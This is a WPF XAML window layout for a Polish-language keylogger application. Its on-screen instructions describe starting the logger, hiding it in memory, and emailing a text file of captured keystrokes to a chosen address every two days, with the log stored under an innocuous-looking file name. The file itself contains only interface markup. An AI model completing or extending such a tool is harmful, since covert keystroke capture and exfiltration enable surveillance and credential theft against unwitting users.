WpfApplication8/MainWindow.xaml

<Window x:Class="WpfApplication8.MainWindow"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        Title="MainWindow" Height="420" Width="525" KeyDown="Window_KeyDown" Closing="Window_Closing" Closed="Window_Closed">
    <Grid Margin="0,0,0.4,-0.6" Height="391" VerticalAlignment="Top">
        <Grid.RowDefinitions>
            <RowDefinition Height="213*"/>
            <RowDefinition Height="178*"/>
        </Grid.RowDefinitions>
        <Button Content="Start" HorizontalAlignment="Left" Margin="62,54,0,0" VerticalAlignment="Top" Width="75" Click="Button_Click" Height="28" />
        <Button Content="Stop" HorizontalAlignment="Left" Margin="62,99,0,0" VerticalAlignment="Top" Width="75" Click="Button_Click_1" Height="28"/>
        <GroupBox Header="Menu" HorizontalAlignment="Left" Margin="22,26,0,0" VerticalAlignment="Top" Height="127" Width="161"/>
        <GroupBox Header="Instuction" HorizontalAlignment="Left" Margin="246,26,0,0" VerticalAlignment="Top" Height="254" Width="242" Grid.RowSpan="2">
            <TextBlock HorizontalAlignment="Left" Margin="10,10,0,-12" TextWrapping="Wrap" Text="Start: Uruchamia program
                       Stop: Wyłącza program
                       Hide: Ukrywa działający program w pamięci komputera
                       Zatwierdź: Po wpisaniu maila program będzie wysyłał na podany wyżej mail wiadomośc z plikiem .txt z odczytem klawiatury komputera raz na 2 dni
                       Wyłączenie programu skutkuje zapisaniem wszystkich plików w pliku .txt
                       
                       Cały odczyt z klawiatury zapisuje się w pliku rtx32/rtx64.txt" Width="205" RenderTransformOrigin="0.5,0.5"/>
        </GroupBox>
        <Button x:Name="Hide1" Content="Hide" HorizontalAlignment="Left" Margin="200,100.2,0,0" VerticalAlignment="Top" Width="101" Click="Hide_Click" Height="34" Grid.Row="1"/>
        <TextBox x:Name="mailBox" HorizontalAlignment="Left" Height="23" Margin="22,8.2,0,0" TextWrapping="Wrap" Text="" VerticalAlignment="Top" Width="120" Grid.Row="1"/>
        <Button Content="Zatwierdź!" HorizontalAlignment="Left" Margin="32,57.2,0,0" VerticalAlignment="Top" Width="75" Click="Mail_button" Grid.Row="1" Height="19"/>
        <GroupBox Header="Mail" HorizontalAlignment="Left" Height="114" Margin="10,190,0,0" VerticalAlignment="Top" Width="145" Grid.RowSpan="2"/>
    </Grid>
</Window>
